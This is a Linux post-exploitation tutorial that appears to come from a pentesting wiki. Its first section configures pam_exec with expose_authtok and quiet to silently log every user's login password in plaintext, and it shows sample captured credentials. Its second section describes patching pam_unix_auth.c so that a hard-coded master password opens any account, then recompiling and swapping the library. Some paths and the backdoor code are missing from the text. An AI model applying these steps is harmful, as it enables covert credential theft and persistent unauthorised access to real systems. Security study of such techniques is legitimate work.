Linux Post-Exploitation

Sniffing Logon Passwords with PAM

Let's configure a PAM module to log each password each user uses to login. If you don't know what is PAM check:
First, we create a bash script that will be invoked whenever a new authentication occurs.
echo " $(date) $PAM_USER, $(cat -), From: $PAM_RHOST" >> /var/log/toomanysecrets.log
The variables are PAM specific and will become available via the module.
Here is the meaning of the variables:
  • $PAM_USER: The username that was entered.
  • $PAM_RHOST: The remote host (typically the IP Address)
  • $(cat -): This reads stdin, and will contain the password that the script grabs
  • The results are piped into a log file at /var/log/toomanysecrets.log
To prevent all users from reading the file consider pre-creating it and running chmod, e.g.:
sudo touch /var/log/
sudo chmod 770 /var/log/
Next, the PAM configuration file needs to be updated the pam_exec module will be used to invoke the script.
There are various config files located in /etc/pam.d/, and we pick common-auth.
sudo nano /etc/pam.d/common-auth
On the very bottom of the file, add the following authentication module:
auth optional quiet expose_authtok /usr/local/bin/
The options have the following meaning:
  • optional: Authenticaiton shouldn’t fail if there is an error (it’s not a required step)
  • This is the living off the land PAM module that can invoke arbitrary scripts
  • expose_authtok: This is the trick that allows to read the password via stdin
  • quiet: Don’t show any errors to the user (if something doesn’t work)
  • The last argument is the shell script that was created previously
Finally, make the file executable:
sudo chmod 700 /usr/local/bin/
Now, let’s try this out and ssh from another machine, or login locally.
And then look at the log file:
$ sudo cat /var/log/toomanysecrets.log
Sun Jun 26 23:36:37 PDT 2022 tom, Trustno1!, From:
Sun Jun 26 23:37:53 PDT 2022 tom, Trustno1!, From:
Sun Jun 26 23:39:12 PDT 2022 tom, Trustno1!, From:

Backdooring PAM

Let go to the sources of PAM (depends on your distro, take the same version number as yours..) and look around line numbers 170/180 in the pam_unix_auth.c file:
vi modules/pam_unix/pam_unix_auth.c
Let’s change this by:
This will allow any user using the password "0xMitsurugi" to log in.
Recompile the pam_unix_auth.c, and replace the file:
sudo cp \
/home/mitsurugi/PAM/pam_deb/pam-1.1.8/modules/pam_unix/.libs/ \
You can automate this process with